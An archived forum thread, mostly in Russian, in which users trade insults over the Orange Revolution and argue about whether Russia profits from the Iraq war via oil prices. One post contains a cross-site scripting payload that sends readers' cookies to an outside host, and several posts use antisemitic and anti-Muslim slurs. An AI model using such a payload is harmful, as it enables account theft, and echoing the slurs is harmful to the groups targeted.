Гість Gennadiy Опубліковано 28 липня, 2005 Поділитися Опубліковано 28 липня, 2005 Американская армия закупает 25 тыс. боевых свиней для патрулирования и охраны важных иракских объектов. Эта методика должна полностью исключить возможность терактов, если только удасться найти компромис с украинским контингентом. Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Viper Опубліковано 26 серпня, 2005 Поділитися Опубліковано 26 серпня, 2005 mailto:[email protected] ] sssssss[/url]` style=`background:url(javaSCrip t:document.images[1].src="htt"+"p"+":"+"/"+"/"+ "antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)` Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Kerrik Опубліковано 27 серпня, 2005 Поділитися Опубліковано 27 серпня, 2005 Fuck you, Gennadiy Посилання на коментар Поділитись на інших сайтах Поділитися
Гість FreeDOM Опубліковано 30 серпня, 2005 Поділитися Опубліковано 30 серпня, 2005 Слушайте, Kerrik, давайте общаться культурно, это все-таки порядочный форум. Не понимаю, за что вы так ненавидите Gеnnadiy? Только за то, что он оранжевый? Вот, что я вам скажу: Ты живешь в Молдове и откуда тебе знать, что там В Украине творится на самом деле? Ты, видимо, прочитал один раз где-то что оранжевые - то плохие, и теперь "каклох" ругаешься на ораневых! Пойми - не лезь в чужой разговор если точно не заешь о чем речь! Оранжевая революция- это единственный выход для Украины! Ты еще хочешь ее разделить! Да кто ты такой чтобы выставлять такие вопросы? Украина - это единая страна, и если восточным лохам чего-то не нравится пусть едут в свою Россию! Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Kerrik Опубліковано 2 вересня, 2005 Поділитися Опубліковано 2 вересня, 2005 Ой бля, ой бляяя!!! Да ты сучёнок ебучий иди вообще играй в свой LinAge и не суй своего носа на этот форум. Ты, сучёнок ты падлючий, будешь учить меня политике? Ты же никогда ей не интересовался. Беги отсюда в политех или в гос или откуда ты там и учи своё calculatoare, а меня учить даже не вздумай. Кстати, заходи на базар, я давно приготовил для тебя босоножки KACLOH. Качество превосходное. :twisted: :twisted: :twisted: Посилання на коментар Поділитись на інших сайтах Поділитися
Гість FreeDOM Опубліковано 3 вересня, 2005 Поділитися Опубліковано 3 вересня, 2005 И опять вы! Керрик, неужели ваш низкий уровень развития не позволяет вам общаться красиво? Я ведь могу и в суд подать за оскорбление личности. Ну, так как я не американец разберемсяя с вами по-русски. Вот вы говорите, что я не интересовался политикой, так? Но откуда Вам знать, что если человек о ней не говорит в открытую, то это не значит, что он ей не интересуется? Вы, с вашим жалким умишком, даже не можете понять элементарных вещей. Я считаю, что таким как вы нет места в этом форуме. Вы жрете слишком много память, оставляя здесь ваши примитивные высказывания. Вас надо удалить! Поставлю-ка я этот вопрос на обсуждение, посмотрим, что будет. :lol: Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Kerrik Опубліковано 3 вересня, 2005 Поділитися Опубліковано 3 вересня, 2005 Многонеуважаемый Ксерокс, Я, великий Ганнибалл, теряю терпение. Ещё одна подобная выходка - и я вышвырну твой народишко с твоего мелкого островка прямо в космос. Короче нахуй с планеты :arrow: :arrow: :arrow: Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Опубліковано 9 вересня, 2005 Поділитися Опубліковано 9 вересня, 2005 Здравствуй, Ганнибал! Я надеюсь ты понял мою шутку насчет удаления тебя из форума? Это просто, чтобы ты не зазнавался и не думал, что ты здесь самый умный. К делу. Я предлагаю мир и совместную борьбу против оранжевых! Соглашаться, или не соглашаться со мной - твое дело. Но помни, если ты мне еще раз переступишь дорогу, то я тебя сотру с лица глобальной сети интернет! Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Kerrik Опубліковано 9 вересня, 2005 Поділитися Опубліковано 9 вересня, 2005 Сотрёшь меня с чего??? Ну, это будет трудновато... А как ты предлагаешь бороться с оранжевыми? Словами их не образумишь - для того чтобы на человека действовали слова, у него должен быть мозг. А реально воевать - так нет нормального оружия (моего старого ножика маловато будет). Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Смотрящий Опубліковано 10 вересня, 2005 Поділитися Опубліковано 10 вересня, 2005 Я тут откопал для вас несколько цитат: Крепкие слова не могут быть сильным доказательством (В.О. Ключевский) Не будь у нас недостатков, нам было бы не так приятно подмечать их у ближних. (Ларошфуко) Ругательства - довод тех, кто не прав. (Руссо) Помните, у человека нет др. выбора - он должен быть человеком (Ежи Лец) Ненависть - это гнев слабых (Доде) Глупцы замечают только промахи людей и не обращают внимания на их достоинства. Они подобны мухам, которые норовят сесть только на воспаленную часть тела (Абу-Аль-Фарадж) ... часто убеждением можно сделать больше чем насилием (Эзоп) Что-то в этом роде ))), надеюсь, кто нибудь из авторов для вас авторитетен. ))) Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Опубліковано 10 вересня, 2005 Поділитися Опубліковано 10 вересня, 2005 Абсолютно согласен почти со всеми цитатами, Смотрящий. Я на самом деле не такой как кажусь в этой перебранке. Мы просто с другом прикалываемся. А сам я человек достаточно толерантный, чтобы выслушать и постараться понять мнение человека, даже если он обладает совершенно противоположными взглядами. Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Kerrik Опубліковано 10 вересня, 2005 Поділитися Опубліковано 10 вересня, 2005 Последнее сообщение - моё. Посилання на коментар Поділитись на інших сайтах Поділитися
Гість slk Опубліковано 14 вересня, 2005 Поділитися Опубліковано 14 вересня, 2005 Очень любопытный сайт: http://www.nextworld.ru/?rid=61997 Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Бывaлый Опубліковано 14 березня, 2006 Поділитися Опубліковано 14 березня, 2006 Война в Ираке, просто напросто выгодна "Другим" нефтедобывающим странам. Дестабилизация в мире исламскими террористическими группировками, способствует увеличению цен на нефть. Чем нестабильней будет на Ближнем Востоке, тем дороже будет стоить нефть, и больше исламские страны будут жиреть и вкладывать деньги в новые терракты, и проводить по миру свою экспансию. В 2003 году нефть стоила 17,5 долл./баррель, Сегодня $57.70 за баррель, а в перспективе цена может зашкалить за 100$. Нефтяные страны: Иран, Азербайджан, Оман, Емен, Объединенные Арабские эмираты, Саудовская Аравия, и т.д., сейчас очень хорошо нагреваются. От войны в Ираке Россия только выиграла. Судьба бюджета 2006-2007 года решается в Персидском заливе и зависит от того, как скоро Коалиция насадит на кол голову Ас-Садра и ему подобных, и сформирует в Багдаде "свое" правительство. Если Вашингтону это удастся не сразу, то российская нефть довольно долго будет стоить довольно дорого. ну , так кому выгодна затяжная война в Ираке ? ? ? СЕЙЧАС ПОСЧИТАЙТЕ. Не секрет, что бюджет России на 80 % зависит от продажи нефти и газа. В 2003 году бюджет закладывался из расчёта 17,5 долл./баррель, но после начала войны в Ираке, по сегодняшним ценам Россия продаёт нефть за 47,5 долл./баррель а в дальнейшем прогнозируется 70 и 100 долл./баррель, всё зависит от продолжительности войны. ЭТО-ЖЕ МИЛЛИАРДЫ ДОЛЛАРОВ, ЧИСТОЙ ,НЕ ЗАПЛАНИРОВАННОЙ ПРИБЫЛИ. ! ! ! Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Arris Опубліковано 14 березня, 2006 Поділитися Опубліковано 14 березня, 2006 Заглавный пост рулит Смеялся Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Денис_26 Опубліковано 14 березня, 2006 Поділитися Опубліковано 14 березня, 2006 Заглавный пост рулит Смеялсяа у меня вызывает улыбку вот эта параноидальная чушь Война в Ираке, просто напросто выгодна "Другим" нефтедобывающим странам. Дестабилизация в мире исламскими террористическими группировками, способствует увеличению цен на нефть. Чем нестабильней будет на Ближнем Востоке, тем дороже будет стоить нефть, и больше исламские страны будут жиреть и вкладывать деньги в новые терракты, и проводить по миру свою экспансию. В 2003 году нефть стоила 17,5 долл./баррель, Сегодня $57.70 за баррель, а в перспективе цена может зашкалить за 100$. Нефтяные страны: Иран, Азербайджан, Оман, Емен, Объединенные Арабские эмираты, Саудовская Аравия, и т.д., сейчас очень хорошо нагреваются. От войны в Ираке Россия только выиграла. Судьба бюджета 2006-2007 года решается в Персидском заливе и зависит от того, как скоро Коалиция насадит на кол голову Ас-Садра и ему подобных, и сформирует в Багдаде "свое" правительство. Если Вашингтону это удастся не сразу, то российская нефть довольно долго будет стоить довольно дорого. ну , так кому выгодна затяжная война в Ираке ? ? ? СЕЙЧАС ПОСЧИТАЙТЕ. Не секрет, что бюджет России на 80 % зависит от продажи нефти и газа. В 2003 году бюджет закладывался из расчёта 17,5 долл./баррель, но после начала войны в Ираке, по сегодняшним ценам Россия продаёт нефть за 47,5 долл./баррель а в дальнейшем прогнозируется 70 и 100 долл./баррель, всё зависит от продолжительности войны. ЭТО-ЖЕ МИЛЛИАРДЫ ДОЛЛАРОВ, ЧИСТОЙ ,НЕ ЗАПЛАНИРОВАННОЙ ПРИБЫЛИ. ! ! ! Это называется “что вижу/слышу, то пишу” + собственное убогое сочинительство Начитался ребенок и давай усех мочить К вашему сведению молодой человек в 2003 году цены на углеводородные фьючерсы именуемые нефтью составляли от 23,5$ до 38$ за баррель. в 2003 г. средняя стоимость ближайших фьючерсов на нефть марки Brent составила $28,48 за баррель. Это так к слову., чтобы все смогли лицезреть уровень вашей брехни В ходе сегодняшних торгов стоимость этих фьючерсов достигала $62,1 за баррель. Но все это не важно. Важно то, как вы брешите, молодой человек Что касается 100$, то за эту отметку цена перевалит рано или поздно, независимо от уровня стабильности того или иного региона. Снижение стабильности может лишь ускорить этот необратимый процесс. В силу вашей неграмотности, вы можете и не знать, что цена определяется на основе формулы спроса и предложения. И опять же с чего вы взяли, что Россия выиграла от войны в Ираке. Вы сударь невежда. Начнем с того, что Россия как и Франция/Германия были против войны.(еще один глупец, который переворачивает реальность в какую-то свою незамысловатую виртуальность).И снова, из-за отсутствия хороших и здравых знаний в вашей голове(в ней только ненависть и зависть) ,вы и понятия не имеете, что Россия потеряла млрд-е контракты в связи с военными действиями на территории Ирака + под давлением США ей пришлось списать 43 млрд-й долг Ираку. Да и когда вы сударь берете вырезки из статей указывайте, пожалуйста, ссылку на полный текст Бюджет РФ состоит всего-навсего на 57% от прибыли на углеводороды, не надо народ вводить в заблуждение. Найдите закон “О государственном бюджете РФ на 2006 год” и внимательного почитайте, уверяю тебя, много интересного для себя узнаешь. В 2003 году бюджет закладывался из расчета на 21$ за баррель Сегодня Россия продает сырую нефть по 58,7 за баррель В бюджет первоначально была внесена ставка 40$, две недели назад ее подняли до 50. Вы сударь, судя по всему не понимаете что такое Бюджет, он не резиновый, а четко фиксированный и в нем не может быть больше чем должно быть, все остальное это уже сверх-доходы, которые невозможно так просто начать тратить это очень вредно для экономики. ЭТО-ЖЕ МИЛЛИАРДЫ ДОЛЛАРОВ, ЧИСТОЙ ,НЕ ЗАПЛАНИРОВАННОЙ ПРИБЫЛИ. ! ! !А вы сударь завидуете, что ли?И вообще, откуда такой нездоровый интерес к чужим бюджетам. Посилання на коментар Поділитись на інших сайтах Поділитися
Fil Опубліковано 15 березня, 2006 Поділитися Опубліковано 15 березня, 2006 Денис_26 в 2003 г. средняя стоимость ближайших фьючерсов на нефть марки Brent составила $28,48 за баррель. Это так к слову. , чтобы все смогли лицезреть уровень вашей брехни Брехня бывает разная, к примеру нужная цифра выводится методом "средней температуры по больнице" за год. :lol: Я отчетливо помню момент, когда цены на нефть не просто повысились, а прыгнули вверх и уже не вернулись назад. Так вот, "прыгнули" они с уровня 22-24$ за баррель. Помню и аргументы против военного вмешательства в Ирак - мол США рвутся к дешевой нефти (типа она была для них слишком дорога(!) по 20$) и хотят завладеть её источником, и нажиться на этом, а вовсе не ликвидировать источник опасности для существования нашей цивилизации, как утверждали американцы. И не слушайте этих америкосов, а ищите "кому выгодно". Обвинения про США и дешевую нефть уже забыты, а если и повторяются, то тихо-тихо, для "своих". Потому как ситуация повернулась другим боком, и подпадает под пословицу: Вор громче всех кричит - Держи Вора! Выгодно оказалось Росии и другим сырьевым странам, но я не в упрёк, и не утверждаю о существовании тайных планов по сталкиванию Ирака и америки. Хотя прекрасно помню (и могу желающим скинуть видео, небольшое) подстрекательства Жириновского, мол "Буш, тебе пришел конец! Иракцы - хорошо обученная, закаленная в боях армия, она пройдет пустыню за час, и порвёт тебя на куски..." (лексику, сходную с лексикой Денис_26 я опустил) Что касается 100$, то за эту отметку цена перевалит рано или поздно, независимо от уровня стабильности того или иного региона. Снижение стабильности может лишь ускорить этот необратимый процесс.А вот с этим полностью согласен, давно надо было поднять, а не "умно" предупреждать что сжигать нефть, всё равно что топить печь ассигнациями. В альтернативных источниках энергии должна появиться потребность. Только тогда они смогут появиться и уничтожить нефть как энергетическую основу цивилизации, и потребность в ней. А у Росии есть некоторое время и деньги для подготовки к этому моменту. Интересно, какие меры принимаются? Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Бывaлый Опубліковано 15 березня, 2006 Поділитися Опубліковано 15 березня, 2006 И вообще, откуда такой нездоровый интерес к чужим бюджетам.А что ты лягушонок, забыл на Украинском Форуме ? ?Вали осюда Мусло-Жидяра Москальская Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Денис_26 Опубліковано 15 березня, 2006 Поділитися Опубліковано 15 березня, 2006 А что ты лягушонок, забыл на Украинском Форуме ? ? Вали осюда Мусло-Жидяра Москальская Примилейшее юное создание, начнем с того, что я также как и вы являюсь гражданином Украины Во-вторых, я не совсем понимаю ваше раздвоение личности, хотя его можно списать на ваш юный возраст. Добавлено: Ср Мар 15, 2006 7:23 am Заголовок сообщения: Re: Почему первый визит Ющенко будет в Россию Украина и Россия всегда останутся Братьями как не крути. мы же Славяне, Русь-Россия ведь пошла от Киевской Руси. Вы уж юное создание определитесь или вы кроите матом Россию или вы с ней;) В-третьих, вы можете очень сильно обидеть жидяр которые являются вашими сторонниками на данном форуме . Увы, я к их общности не отношусь, хотя моя гражданская жена принадлежит к этой этнической группе. Кому: Фильке Я отчетливо помню момент, когда цены на нефть не просто повысились, а прыгнули вверх и уже не вернулись назад. Так вот, "прыгнули" они с уровня 22-24$ за баррель. У тебя память посыпалась Помню и аргументы против военного вмешательства в Ирак - мол США рвутся к дешевой нефти (типа она была для них слишком дорога(!) по 20$) и хотят завладеть её источником, и нажиться на этом, а вовсе не ликвидировать источник опасности для существования нашей цивилизации, как утверждали американцы. И не слушайте этих америкосов, а ищите "кому выгодно". Обвинения про США и дешевую нефть уже забыты, а если и повторяются, то тихо-тихо, для "своих". дебил ты филька те не кто не говорил (кроме меня конечно) Господа демократы нам пора домой! Из серии “НАГАДИЛ и убежал” http://2005.rambler.ru/db/news-new/msg.htm...amp;mid=7499574 Почему мир бежит от США http://www.inosmi.ru/translation/226122.html http://lenta.ru/news/2006/03/15/noproof/ Пентагон на этот раз открестился от своего правительства? Буш и Рамсфелд действуют старыми методами. Сначала словесный понос потом бомбардировки. Ведь МЫ великая демократия не можем допустить, чтобы Иран свою нефть скидывал китайцам, тем самым, вызывал нефтяной голод у нашей демократии ) филька оболтус ты наивный гы-гы Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Бывaлый Опубліковано 15 березня, 2006 Поділитися Опубліковано 15 березня, 2006 Вы уж юное создание определитесь или вы кроите матом Россию или вы с ней;) Слушай ты, лягушонок прыщавый, тебе в школу не пора случаем ? ? По поводу России: Я всегда был за Славянский народ, но без такик как ты праституток, и нашим и вашим, те террористы "хорошие", а вот те "плохие" Все они Мусло-Ублюдки, и ты для них вообще, просто кусок Неверного мяса. Что касается Выгоды России от войны в Ираке, так что здесь плохого ? ? До войны в Ираке нефть продавали за 17,5 долл./баррель, сегодня за $62,1 за баррель, и чем дальше будет разгораться война, тем дороже будет стоить Нефть. И я не удивлюсь, если окажется что Россия сама, спонсирует Иракских террористов. :!: Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Денис_26 Опубліковано 15 березня, 2006 Поділитися Опубліковано 15 березня, 2006 Слушай ты, лягушонок прыщавый Явно у вас двойка по ботаники….. Ну что ж вы так, не расстраивайте папу и маму. Лягушат прыщавых в природе не бывает. Учите ботанику, она вам пригодится в жизни. Что касается Выгоды России от войны в Ираке, так что здесь плохого ? ? Плохого, то, что гибнут люди такие же, как мы с вами молодой человек, как ваша мама. Если война для вас это способ наживы(на молодой радикализм можно многое списать), то уверяю вас здравые Государства так не мыслят хотя соблазн велик. Иначе если вы так будете вести дела, то с вами в этом мире никто не захочет говорить и иметь дело, даже если вы будите супер богаты. При взаимоотношениях на международной арене очень четко видно кто как себя ведет, и кто что думает по тому или иному поводу. И еще раз хочется напомнить, что Россия потеряла намного больше чем приобрела от коротковременного всплеска цен на нефть в период активной военной фазы в Ираке. Уверяю вас, что сегодняшние цены ни в коей мере не культивируются на нестабильности в Ираке, разве что отчасти. Просто вы очень молоды и не знаете экономических правил, потому вам и кажется всякий вздор. Сегодняшние цены это результат высокого и активно растущего спроса и ограниченного предложения(мощности производства загружены под завязку , а новые в эксплуатацию не сдаются). Ну экономической теории достаточно. До войны в Ираке нефть продавали за 17,5 долл./баррель, сегодня за $62,1 за баррель, и чем дальше будет разгораться война, тем дороже будет стоить Нефть. До войны в Ираке все же цифры были несколько иные, вы не находите юноша (см таблицу выше) Сегодняшние цены…… подними глаза чуточку выше. Чем меньше будет нефти на земле тем дороже будет она стоить и тем больше будет воин за нее Как видите молодой человек, война, это следствие, а не как не причина (надеюсь вы когда повзрослеете изучите намного лучше причинно-следственные связи, нежели чем ботанику) Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Бывaлый Опубліковано 16 березня, 2006 Поділитися Опубліковано 16 березня, 2006 Лягушат прыщавых в природе не бывает.ААААА Рассмешил так рассмешил А ты тогда кто ? ? ? ? ? Ты и есть тот самый, прыщавый, недоразвитый Лягушонок. Учите ботанику, она вам пригодится в жизни.Ну теперь понятны твои познания малец, кроме Ботаники вам, даунам что задают в школе ? ? ? ? Посилання на коментар Поділитись на інших сайтах Поділитися
Гість Денис_26 Опубліковано 30 березня, 2006 Поділитися Опубліковано 30 березня, 2006 Безрассудная жажда войны ("The Boston Globe", США) http://www.inosmi.ru/translation/226462.html Посилання на коментар Поділитись на інших сайтах Поділитися
Рекомендовані повідомлення
Заархівовано
Ця тема знаходиться в архіві та закрита для подальших відповідей.